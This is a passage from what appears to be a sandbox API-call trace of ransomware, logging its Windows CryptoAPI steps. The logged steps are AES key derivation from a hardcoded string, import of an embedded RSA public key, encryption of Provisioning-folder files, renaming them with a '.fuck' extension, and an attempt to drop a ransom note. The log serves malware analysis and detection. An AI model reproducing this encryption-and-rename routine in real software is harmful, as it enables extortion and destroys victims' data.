dwCertEncodingType=0x1, pInfo=0x28c75e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7618*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7620*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e87b8) returned 1 [0240.183] CryptEncrypt (in: hKey=0x28e87b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.184] CryptEncrypt (in: hKey=0x28e87b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4810*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d4810*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4810, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.184] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.184] CryptEncrypt (in: hKey=0x28e8478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.184] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.184] CloseHandle (hObject=0xffffffff) returned 1 [0240.184] CloseHandle (hObject=0xffffffff) returned 1 [0240.184] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.184] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.185] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.gsg")) returned 0 [0240.185] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\customizations.xml.fuck")) returned 0 [0240.185] CryptDestroyHash (hHash=0x28e8a78) returned 1 [0240.185] CryptDestroyKey (hKey=0x28e8478) returned 1 [0240.185] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.186] FindNextFileA (in: hFindFile=0x28e84b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.186] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.186] GetLastError () returned 0x5 [0240.186] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml")) returned 0x20 [0240.186] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.186] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.187] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.187] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.188] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.189] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.189] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.189] CryptHashData (hHash=0x28e8838, pbData=0x27e2538, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.189] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8838, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8478) returned 1 [0240.190] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.190] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.190] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d4348) returned 1 [0240.190] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4348, dwCertEncodingType=0x1, pInfo=0x28c8148*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8178*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8180*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e8a78) returned 1 [0240.190] CryptEncrypt (in: hKey=0x28e8a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.190] CryptEncrypt (in: hKey=0x28e8a78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d41b0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d41b0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.190] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d41b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.190] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.190] CryptEncrypt (in: hKey=0x28e8478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.190] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.191] CloseHandle (hObject=0xffffffff) returned 1 [0240.191] CloseHandle (hObject=0xffffffff) returned 1 [0240.191] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.191] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.191] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.gsg")) returned 0 [0240.192] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\masterdatastore.xml.fuck")) returned 0 [0240.192] CryptDestroyHash (hHash=0x28e8838) returned 1 [0240.192] CryptDestroyKey (hKey=0x28e8478) returned 1 [0240.192] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.192] FindNextFileA (in: hFindFile=0x28e84b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.192] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e83f8 [0240.192] FindNextFileA (in: hFindFile=0x28e83f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.192] FindNextFileA (in: hFindFile=0x28e83f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.193] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8678 [0240.193] FindNextFileA (in: hFindFile=0x28e8678, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.193] FindNextFileA (in: hFindFile=0x28e8678, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.193] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.193] GetLastError () returned 0x5 [0240.193] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.193] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.193] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.194] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.194] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.194] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28d49a8) returned 1 [0240.196] CryptCreateHash (in: hProv=0x28d49a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.196] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.196] CryptHashData (hHash=0x28e86b8, pbData=0x27e2380, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.197] CryptDeriveKey (in: hProv=0x28d49a8, Algid=0x6610, hBaseData=0x28e86b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e8638) returned 1 [0240.197] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.197] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.197] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28d43d0) returned 1 [0240.197] CryptImportPublicKeyInfo (in: hCryptProv=0x28d43d0, dwCertEncodingType=0x1, pInfo=0x28c8a38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8a68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c8a70*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e8838) returned 1 [0240.197] CryptEncrypt (in: hKey=0x28e8838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.197] CryptEncrypt (in: hKey=0x28e8838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4b40*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28d4b40*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.197] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4b40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.197] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.197] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.198] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.198] CloseHandle (hObject=0xffffffff) returned 1 [0240.198] CloseHandle (hObject=0xffffffff) returned 1 [0240.198] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.198] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.199] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.199] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.199] CryptDestroyHash (hHash=0x28e86b8) returned 1 [0240.199] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.199] CryptReleaseContext (hProv=0x28d49a8, dwFlags=0x0) returned 1 [0240.199] FindNextFileA (in: hFindFile=0x28e8678, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.199] FindClose (in: hFindFile=0x28e8678 | out: hFindFile=0x28e8678) returned 1 [0240.200] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.200] AreFileApisANSI () returned 1 [0240.200] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28d4d60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.200] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.200] GetLastError () returned 0x5 [0240.200] GetLastError () returned 0x5 [0240.200] FindNextFileA (in: hFindFile=0x28e83f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.200] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.200] GetLastError () returned 0x5 [0240.200] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml")) returned 0x20 [0240.201] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.201] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.201] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.202] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.202] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28d4d60) returned 1 [0240.204] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.204] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.204] CryptHashData (hHash=0x28e8478, pbData=0x27e2448, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.204] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8478, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e86f8) returned 1 [0240.204] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.204] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.204] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28d4458) returned 1 [0240.205] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4458, dwCertEncodingType=0x1, pInfo=0x28c7378*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c73a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c73b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e8978) returned 1 [0240.205] CryptEncrypt (in: hKey=0x28e8978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.205] CryptEncrypt (in: hKey=0x28e8978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4898*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28d4898*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.205] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4898, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.205] 